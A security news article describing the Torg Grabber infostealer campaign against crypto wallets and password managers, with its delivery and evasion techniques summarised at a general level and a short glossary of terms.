Crypto Wallets Under Siege: Inside the Ruthless Rise of Torg Grabber Infostealer
Subtitle: A new malware campaign is ransacking hundreds of crypto wallets and password managers, evolving faster than defenders can keep up.
Late last year, a silent predator began stalking the digital savannah, preying on the hopes-and wallets-of crypto enthusiasts worldwide. Its name: Torg Grabber. In just three months, this info-stealing malware has taken aim at an unprecedented array of browser extensions and wallets, outpacing security teams with its relentless evolution and technical cunning. For anyone storing tokens, passwords, or digital secrets online, the threat is no longer theoretical-it's at your doorstep.
The Anatomy of a Digital Predator
According to researchers at Gen Digital, Torg Grabber is no ordinary info-stealer. Its development has been frenetic: 334 unique samples have surfaced between December 2025 and February 2026, each more sophisticated than the last. The malware first infiltrates victims through the so-called “ClickFix” technique, hijacking the clipboard and luring users into executing a booby-trapped PowerShell command. Once inside, it slips past defenses using layers of obfuscation, direct system calls, and reflective loading-running its payload entirely in memory to evade antivirus tools.
But Torg Grabber’s real menace lies in its scope. It targets 25 Chromium-based browsers and eight Firefox variants, scraping credentials, cookies, and autofill data. Its hit list reads like a who’s who of the crypto world: MetaMask, TrustWallet, Phantom, Coinbase, Binance, Exodus, TronLink, and hundreds more-including obscure wallets with only a handful of users. Password managers and authentication tools aren’t spared either, with LastPass, 1Password, Bitwarden, and dozens of others in its crosshairs.
The malware’s capabilities are chillingly comprehensive. It can fingerprint the host machine, inventory installed software (including antivirus tools), grab screenshots, and exfiltrate files from standard folders. Torg Grabber even packs the ability to execute custom shellcode delivered from its command-and-control servers, which are registered and cycled weekly to stay ahead of takedowns. A related tool, “Underground,” goes even further-injecting itself into browsers to extract encryption keys, a technique borrowed from other notorious stealers like VoidStealer.
Researchers have documented at least 40 operator “tags,” suggesting a growing cybercriminal ecosystem behind Torg Grabber. Its infrastructure is professional, its tactics evolving, and its targets expanding weekly. For users, the risk isn’t just about losing cryptocurrency-it’s about having every digital secret exposed in a matter of seconds.
Conclusion: A Wake-Up Call for the Digital Age
Torg Grabber is more than just another piece of malware-it’s a warning shot across the bow of anyone who relies on browser-based wallets, password managers, or digital authentication. As cybercriminals innovate, so too must defenders. In the escalating arms race for our digital lives, vigilance and proactive security are the only answers. The next evolutionary leap in malware is already here-will we be ready for the one after?
WIKICROOK
- Infostealer: An infostealer is malware designed to steal sensitive data-like passwords, credit cards, or documents-from infected computers without the user's knowledge.
- Clipboard hijacking: Clipboard hijacking is when malware secretly changes copied data, like wallet addresses, to steal information or redirect funds without your knowledge.
- Reflective loading: Reflective loading executes code directly in memory, bypassing disk and standard detection, making it a popular technique for stealthy cyberattacks.
- Command: A command is an instruction sent to a device or software, often by a C2 server, directing it to perform specific actions, sometimes for malicious purposes.
- App: An app is a software program that performs specific tasks on digital devices. Security features like bound encryption help protect app data from unauthorized access.




